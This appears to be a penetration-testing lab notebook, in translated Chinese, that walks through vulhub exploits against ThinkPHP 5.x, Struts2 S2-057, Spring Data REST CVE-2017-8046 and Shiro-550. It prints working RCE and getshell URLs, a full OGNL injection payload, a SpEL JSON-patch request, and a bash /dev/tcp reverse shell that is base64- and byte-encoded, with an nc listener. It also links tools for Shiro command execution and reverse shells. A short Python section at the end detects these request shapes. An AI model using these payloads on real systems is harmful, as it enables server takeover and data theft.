Frameworks & Middleware & CMS
Thinkphp
ThinkPHP 5.x remote command execution and getshell
Lab: vulhub/thinkphp/5-rce
Install Docker: apt install docker-compose
docker version      show the Docker version information
docker images       list the images you have
docker ps           list running Docker containers
Download and build the vulhub lab: git clone https://github.com/vulhub/vulhub.git
Enter the directory /root/vulhub/thinkphp/5-rce
Start the environment: docker-compose up -d
docker-compose build
docker ps -a                    list all containers
docker stop d1fed24ff35e        stop the container
docker-compose up -d            start the environment
Open http://192.168.1.199:8080/index.php in the browser
Remote command execution
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
Remote code execution
POC:
?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
getshell
POC:
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo "" >>1.php
This creates the file 1.php in the web root, which outputs phpinfo; visit 192.168.1.199/1.php
Struts2
S2-057 remote code execution vulnerability
Kali, vulhub lab /struts2/s2-057
docker-compose up -d
Visit http://192.168.1.199:8080/struts2-showcase
In the URL bar enter http://192.168.1.199:8080/struts2-showcase/${(123+123)}/actionChain1.action
After refreshing, you can see that the number in the middle of the path has been evaluated (the two values were added).
Refresh the page, capture the request, and forward it to Repeater
Replace the 246 with
http://192.168.1.199:8080/struts2-showcase/%24%7B%0A(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23ct%3D%23request%5B'struts.valueStack'%5D.context).(%23cr%3D%23ct%5B'com.opensymphony.xwork2.ActionContext.container'%5D).(%23ou%3D%23cr.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ou.getExcludedPackageNames().clear()).(%23ou.getExcludedClasses().clear()).(%23ct.setMemberAccess(%23dm)).(%23a%3D%40java.lang.Runtime%40getRuntime().exec('id')).(%40org.apache.commons.io.IOUtils%40toString(%23a.getInputStream()))%7D/actionChain1.action
Delete action/register2, then click Go
Replace id with whoami
Spring
Spring Data REST remote command execution (CVE-2017-8046)
Environment
Kali, vulhub lab /spring/CVE-2017-8046
FOFA: icon_hash="116323821"
Vulnerability overview
Spring Data is an open-source framework that simplifies database access and supports cloud services; Spring Data Commons is the base framework shared by all Spring Data sub-projects. Spring Data Commons 2.0.5 and earlier contain a SpEL expression injection vulnerability: an attacker can inject a malicious SpEL expression to execute arbitrary commands.
Affected versions
Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 – 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 – 2.0.5 (Kay SR5)
Spring Data REST 3.0 – 3.0.5 (Kay SR5)
Older versions no longer supported upstream
Visit http://192.168.1.37:8080/login
Capture the request to http://192.168.1.37:8080/customers/1 and modify it
Change GET to PATCH
Add the header Content-Type: application/json-patch+json
Add the body: [{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
PATCH /customers/1 HTTP/1.1
Host: 192.168.1.37:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:98.0) Gecko/20100101 Firefox/98.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/json-patch+json
Cookie: JSESSIONID=D81A37ACC5D0088A5F1F0966A251B92F
Upgrade-Insecure-Requests: 1
If-Modified-Since: Thu, 17 Mar 2022 08:32:07 GMT
If-None-Match: "0"
Cache-Control: max-age=0
Content-Length: 200

[{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,115}))/lastname", "value": "vulhub" }]
Change the command to be executed to the reverse shell command: bash -i >& /dev/tcp/192.168.1.37/7777 0>&1
Encode it at https://jackson-t.ca/runtime-exec-payloads.html
Result: bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNzc3NyAwPiYxCg==}|{base64,-d}|{bash,-i}
Then convert it to ASCII codes; open python in a terminal:
payload = b'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMzcvNzc3NyAwPiYx}|{base64,-d}|{bash,-i}'
# join the decimal value of each byte with commas, the form used inside new byte[]{...}
bytecode = ','.join(str(i) for i in list(payload))
print(bytecode)
Result:
98,97,115,104,32,45,99,32,123,101,99,104,111,44,89,109,70,122,97,67,65,116,97,83,65,43,74,105,65,118,90,71,86,50,76,51,82,106,99,67,56,120,79,84,73,117,77,84,89,52,76,106,69,117,77,122,99,118,78,122,99,51,78,121,65,119,80,105,89,120,125,124,123,98,97,115,101,54,52,44,45,100,125,124,123,98,97,115,104,44,45,105,125
Now test with the payload. As usual, start a listener on your own server first, then send the payload:
nc -lvp 7777
Send the following payload, replacing the encoded bytes after exec with the ASCII codes you generated
Shiro
Malicious command --> serialize --> AES encrypt --> base64 encode --> send as Cookie
Shiro fingerprint
The response contains the header Set-Cookie: rememberMe=deleteMe
Shiro rememberMe deserialization vulnerability (Shiro-550)
Vulnerability principle
The Apache Shiro framework provides a remember-me feature (RememberMe): after a user logs in successfully, an encrypted and encoded cookie is generated. On the server side, the rememberMe cookie value is first base64-decoded, then AES-decrypted, and then deserialized. Because the AES key is a known default, anyone can forge such a cookie, which leads to a deserialization RCE vulnerability.
Affected versions
Apache Shiro < 1.2.4
Environment
Kali, vulhub lab /shiro/CVE-2016-4437
Capture the request and forward it to Repeater
Burp Shiro vulnerability detection plugin
BurpShiroPassiveScan: https://github.com/pmiaowu/BurpShiroPassiveScan/releases/tag/BurpShiroPassiveScan-1.7.6
Install and enable the Shiro detection plugin in BurpSuite's Extender
Capture the request again
When BurpSuite captures a Shiro packet, the plugin automatically checks the key; when a default Shiro key is found, a corresponding alert is raised
Command execution
Use a tool to execute commands:
shiro_attack_2.2 tool: https://github.com/j1anFen/shiro_attack/releases/tag/2.2
Reverse shell
Tool: https://github.com/feihong-cs/ShiroExploit-Deprecated/releases/tag/v2.51
Reverse shell: start an nc listener on Ubuntu:
Fire again
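As an added example (not part of this note or of any tool it links), the following Python detection rules flag the request shapes walked through in the ThinkPHP, S2-057, Spring Data REST and Shiro sections above, run over constructed sample requests; the rule names and the 512-character cookie threshold are this example's own assumptions.

```python
import re
from urllib.parse import unquote

# Detection rules for the request shapes walked through in this note. Each rule
# looks at one view of a request: the URL-decoded request URL, the JSON Patch
# body, or the Cookie header. Rule names are this example's own labels.
RULES = [
    ("thinkphp5-invokefunction", "url",
     re.compile(r"think\\?app/invokefunction.*function=call_user_func_array", re.I)),
    ("struts2-s2-057-ognl-in-path", "url",
     re.compile(r"^/[^?]*\$\{[^?]*\}[^?]*\.action", re.I)),
    ("spring-data-rest-spel-patch", "body",
     re.compile(r'"path"\s*:\s*"[^"]*T\(', re.I)),
    # Heuristic: a normal rememberMe cookie is short, a serialized gadget chain
    # (AES + base64) is much longer. 512 chars is an assumed threshold; tune per app.
    ("shiro-rememberme-oversized", "cookie",
     re.compile(r"rememberMe=[A-Za-z0-9+/=]{512,}")),
]

def classify(req):
    """Return the names of all rules matching one request dict (keys: url,
    content_type, cookie, body; all optional strings). Detection only."""
    views = {
        "url": unquote(req.get("url", "")),
        # Only a JSON Patch body reaches the SpEL sink described above.
        "body": req.get("body", "") if "json-patch+json" in req.get("content_type", "") else "",
        "cookie": req.get("cookie", ""),
    }
    return [name for name, view, rx in RULES if rx.search(views[view])]

# Constructed sample requests (not captured traffic); shapes mirror the lab payloads above.
SAMPLE_REQUESTS = [
    {"url": "/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami"},
    {"url": "/struts2-showcase/%24%7B(123%2B123)%7D/actionChain1.action"},
    {"url": "/customers/1", "content_type": "application/json-patch+json",
     "body": '[{"op":"replace","path":"T(java.lang.Runtime).getRuntime().exec(\'id\')/lastname","value":"x"}]'},
    {"url": "/customers/1", "content_type": "application/json-patch+json",
     "body": '[{"op":"replace","path":"/lastname","value":"vulhub"}]'},   # benign patch
    {"url": "/login", "cookie": "rememberMe=" + "A" * 600 + "=="},
    {"url": "/index.php?s=index/user/login", "cookie": "rememberMe=deleteMe"},  # benign
]

def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> matched rule names, for every request that triggered a rule."""
    return {i: names for i, req in enumerate(requests) if (names := classify(req))}
```

Calling scan() on the constructed samples flags requests 0, 1, 2 and 4 and leaves the two benign ones alone.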